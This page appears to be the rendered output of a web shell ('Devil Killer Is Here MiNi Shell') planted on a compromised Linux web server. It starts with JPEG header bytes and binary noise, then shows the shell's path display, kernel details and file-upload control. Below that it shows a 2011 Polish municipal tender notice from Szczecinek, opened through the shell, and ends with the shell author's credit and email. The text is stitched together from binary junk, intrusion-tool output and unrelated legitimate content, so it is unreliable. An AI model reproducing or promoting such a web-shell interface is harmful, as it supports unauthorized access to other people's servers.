JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110127/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110127/30581-N-2011.html

<p class="kh_header"><b>Szczecinek: Pełnienie funkcji inspektora nadzoru inwestorskiego (inżyniera kontraktu) nad realizacją projektu nr WND-RPZP.05.02.02-32-006/10 pn.: Odrestaurowanie zabytkowego skrzydła Zamku Książąt Pomorskich w Szczecinku na Centrum kongresowo-szkoleniowe z zapleczem gastronomicznym i hotelowym</b><br>
<b>Numer ogłoszenia: 30581 - 2011; data zamieszczenia: 27.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Szczecinek , Plac Wolności 13, 78-400 Szczecinek, woj. zachodniopomorskie, tel. 094 3714129, faks 094 3740254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecinek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego (inżyniera kontraktu) nad realizacją projektu nr WND-RPZP.05.02.02-32-006/10 pn.: Odrestaurowanie zabytkowego skrzydła Zamku Książąt Pomorskich w Szczecinku na Centrum kongresowo-szkoleniowe z zapleczem gastronomicznym i hotelowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane /Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zm./ nad realizacją obiektu zabytkowego skrzydła Zamku Książąt Pomorskich w Szczecinku, tj. projekt nr WND-RPZP.05.02.02-32-006/10 pn.: Odrestaurowanie zabytkowego skrzydła Zamku Książąt Pomorskich w Szczecinku na Centrum kongresowo-szkoleniowe z zapleczem gastronomicznym 
i hotelowym, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013, który będzie mógł samoistnie spełniać funkcję techniczną w zakresie przebudowy zabytkowego skrzydła Zamku Książąt Pomorskich na Centrum Kongresowo - Szkoleniowe wraz z wykonaniem urządzeń budowlanych, przy ul. Mickiewicza w Szczecinku - na terenie działek nr: 77/6, 77/1, 68, 71 w obrębie 12 oraz na terenie działki nr 408 w obrębie 13, zgodnie z:
a) projektem zagospodarowania terenu branży architektonicznej - projekt budowlany;
b) projektem zagospodarowania terenu branży sanitarnej - projekt budowlany;
c) projektem zagospodarowania terenu branży elektrycznej - projekt budowlany;
d) projektem zagospodarowania terenu zieleń i mała architektura - projekt budowlany;
e) dokumentacją geotechniczną;
f) inwentaryzacją architektoniczną;
g) projektem budowlanym branży architektonicznej;
h) ekspertyzą techniczną;
i) projektem budowlanym branży konstrukcyjnej;
j) projektem budowlanym branży sanitarnej;
k) projektem budowlanym branży elektrycznej;
l) projektem budowlanym technologii kuchni;
m) projektem budowlanym branży telekomunikacyjnej;
n) projektem wykonawczym wnętrz;
o) projektem wykonawczym branży konstrukcyjnej;
p) projektem wykonawczym robót wyburzeniowych i rozbiórkowych;
q) projektem wykonawczym branży telekomunikacyjnej (instalacje teletechniczne niskoprądowe w zakresie instalacji nagłośnienia i multimedialnej);
r) projektem wykonawczym branży telekomunikacyjnej (instalacje telefoniczne, LAN, WLAN);
s) projektem wykonawczym branży telekomunikacyjnej (instalacje teletechniczne niskoprądowe w zakresie instalacji CCTV);
t) projektem wykonawczym branży telekomunikacyjnej (instalacja telewizyjna RTV);
u) projektem wykonawczym instalacji sygnalizacji pożaru;
v) projektem wykonawczym instalacji sanitarnych;
w) programem prac konserwatorskich,
x) umową o dofinansowanie przedmiotowego Projektu UDA-RPZP.05.02.02-32-006/10-00 z dnia 18-11-2010 r.
Zakres wielobranżowego nadzoru inwestorskiego obejmuje następujące czynności:
1) Reprezentowania Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji z  projektem budowlano-wykonawczym, pozwoleniem na budowę, przepisami, w tym techniczno-budowlanymi oraz zasadami wiedzy technicznej. 
2) Sprawdzania jakości wykonywanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobiegania zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie.
3) Sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających najpóźniej w ciągu 3 dni roboczych po zgłoszeniu ich przez kierownika budowy zapisem w dzienniku budowy, uczestniczenia w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowania i udziału w czynnościach odbioru gotowych obiektów budowlanych i przekazywania ich do użytkowania potwierdzając wpisem w dzienniku budowy.
4) Potwierdzania w dzienniku budowy faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowania rozliczeń budowy /m. in. protokoły odbioru, faktury i kosztorysy wykonawcze/.
5) Zapoznania się z dokumentacją projektowo - kosztorysową.
6) Zgłoszenia wszelkich poprawek do opracowanej dokumentacji w celu prawidłowego wykonania zadania (błędy i wady dokumentacji) przed przystąpieniem do pełnienia funkcji Inspektora Nadzoru.
7) Przekazania protokolarnego w imieniu Zamawiającego placu budowy.
8) Dopilnowania wyznaczenia w terenie obiektów budowlanych przez służby geodezyjne potwierdzając w dzienniku budowy.
9) Kontrolowania zgodności wykonywanych robót z dokumentacją projektową i umową.
10) Kontrolowania zgodności przebiegu robót z obowiązującym harmonogramem oraz terminowości ich wykonania.
11) Kontrolowania ilości i wartości wykonanych robót przed odbiorem zakończonego przedmiotu umowy.
12) Kontrolowania prawidłowości zafakturowania wykonanych robót.
13) Kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonywania robót.
14) Wykonawca zobowiązany jest bezwzględnie do min. 2 pobytów tygodniowo na placu budowy wyczerpujących jednoznacznie rozwiązanie problemów potwierdzając swoją bytność stosownym zapisem.
15) Rozstrzygania w porozumieniu z kierownikiem budowy wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu bądź rzeczoznawców.
16) Wykazywania inicjatywy osiągania oszczędności i obniżki kosztów budowy oraz ujawniania występujących na nadzorowanej budowie nieprawidłowości i im przeciwdziałania.
17) Sporządzenia ewentualnego protokołu konieczności robót dodatkowych, zamiennych i zaniechanych oraz sprawdzenia kosztorysów różnicowych i wystąpienie do Zamawiającego z wnioskiem o zatwierdzenie ich wykonania.
18) Dokonywania kontroli ilości i wartości materiałów uzyskanych z rozbiórki, uzgadniania z kierownikiem budowy zakresu zagospodarowania tych materiałów na budowie oraz przedstawienia Zamawiającemu spisu materiałów z rozbiórki.
19) Prowadzenie i udział w naradach koordynacyjnych oraz komisjach technicznych do oceny lub rozstrzygania technicznych spraw budowy.
20) Dokonywania odbiorów częściowych robót i obiektów wg zasad ustalonych w umowie zawartej przez Zamawiającego z wykonawcą robót budowlanych.
21) Stwierdzenia wykonania przez służbę geodezyjną powykonawczych pomiarów inwentaryzacyjnych potwierdzając zapisem w dzienniku budowy.
22) Wykonania inwentaryzacji robót przerwanych oraz nowego przedmiaru robót w przypadku przerwy w robotach lub rozwiązania umowy zawartej pomiędzy Zamawiającym a wykonawcą robót budowlanych.
23) Potwierdzenia w dzienniku budowy zapisu kierownika budowy o gotowości obiektu lub robót do odbioru oraz należyte urządzenie i uporządkowanie terenu budowy.
24) Opracowania i skompletowania dokumentów niezbędnych do odbioru końcowego zadania.
25) Przekazania Zamawiającemu ostatecznych dokumentów odbiorowych, o których mowa w pkt 24 z oświadczeniem o ich kompletności i zgodności z wymogami Prawa budowlanego.
26) Uczestniczenia w odbiorze końcowym i przekazaniu do użytku - eksploatacji nadzorowanej inwestycji.
27) Zabezpieczenia i przekazania Zamawiającemu dziennika budowy oraz dokumentacji powykonawczej.
28) Organizowanie, prowadzenie i egzekwowanie ustaleń corocznych przeglądów gwarancyjnych przez cały okres gwarancji udzielonej Zamawiającemu przez wykonawcę robót budowlanych.
29) Podjęcie realizacji całokształtu czynności związanych z przeprowadzeniem inwestycji wg zasad i procedur wymaganych przez Regionalny Program Operacyjny Województwa Zachodniopomorskiego na lata 2007-2013, w tym m.in.:
a. przestrzeganie zapisów umowy o dofinansowanie przedmiotowego Projektu UDA-RPZP.05.02.02-32-006/10-00 z dnia 18-11-2010 r. w ramach RPO WZ,
b. zamieszczania we wszystkich przygotowywanych dokumentach, związanych z realizacją przedmiotowego przedsięwzięcia, informacji o udziale Unii Europejskiej oraz Europejskiego Funduszu rozwoju Regionalnego we współfinansowaniu Projektu 
- wg przekazanego wzoru,
c. sporządzanie w formie elektronicznej wniosków o płatność nie rzadziej niż raz na kwartał i nie częściej niż raz na miesiąc oraz przekazywanie ich zamawiającemu na dwa dni robocze przed wyznaczonym terminem przez Instytucję Zarządzającą
RPO WZ,
d. stosowanie się do obowiązujących i aktualnych wzorów dokumentów oraz informacji zamieszczanych w szczególności na stronie internetowej Instytucji Zarządzającej RPO WZ, w tym Wytycznych dla Wnioskodawcy, a także innych dokumentów w ramach Programu,
e. przedstawianie na żądanie Instytucji Zarządzającej RPO WZ wszelkich dokumentów, informacji i wyjaśnień związanych z realizacją Projektu oraz przekazywanie ich zamawiającemu na dwa dni robocze przed wyznaczonym przez nią terminie,
f. przygotowywanie do instytucji RPO WZ prawidłowo wypełnionych części sprawozdawczych z realizacji projektu w ramach wniosków o płatność zgodnie
z obowiązującymi wzorami, raz na kwartał w formie elektronicznej oraz przekazywanie ich zamawiającemu na dwa dni robocze przed wyznaczonym terminem przez Instytucję Zarządzającą RPO WZ,
g. przygotowywanie i przekazywanie zamawiającemu na dwa dni robocze przed wyznaczonym terminem przez Instytucję Zarządzającą RPO WZ wszelkich dokumentów i informacji związanych z realizacją Projektu, których zażąda Instytucja Zarządzająca RPO WZ,
h. uczestniczenie w kontrolach przeprowadzanych przez Instytucję Zarządzającą RPO WZ oraz inne podmioty uprawnione do jej przeprowadzenia na podstawie odrębnych przepisów,
i. wykonywanie i przekazywanie zamawiającemu, wraz z prawami autorskimi, comiesięcznej dokumentacji fotograficznej z postępów realizacji robót, w postaci elektronicznych plików graficznych w formacie .jpg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunków art. 22 ust. 1 Prawa zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w ciągu ostatnich 3 lat min. 1 usługi nadzoru inwestorskiego nad robotami budowlanymi prowadzonymi na obiekcie wpisanym do rejestru zabytków (zabytek nieruchomy), w której wartość robót budowlanych nie była niższa niż 3.000.000,00 zł. brutto, potwierdzonej, że usługa została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami posiadającymi uprawnienia do nadzorowania robotami budowlanymi łącznie z wpisem na listę członków właściwej izby samorządu zawodowego w branżach: architektonicznej; konstrukcyjno-budowlanej; instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 
Ponadto inspektor nadzoru w branży konstrukcyjno - budowlanej musi posiadać doświadczenie w nadzorowaniu robotami budowlanymi min. 5 lat oraz musi spełniać wymogi §8 ust. 1, ust. 2 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych /Dz. U. z 2004 r. Nr 150, poz. 1579/, tj. roboty budowlane przy zabytkach nieruchomych mogą nadzorować osoby, które posiadają odpowiednie uprawnienia budowlane określone przepisami Prawa budowlanego oraz odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie opłaconego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecinek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Szczecinek, Plac Wolności 13, 78-400 Szczecinek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2011 godzina 10:00, miejsce: Biuro Obsługi Interesanta Urzędu Miasta Szczecinka, Plac Wolności 13, 78-400 Szczecinek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 18.03.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com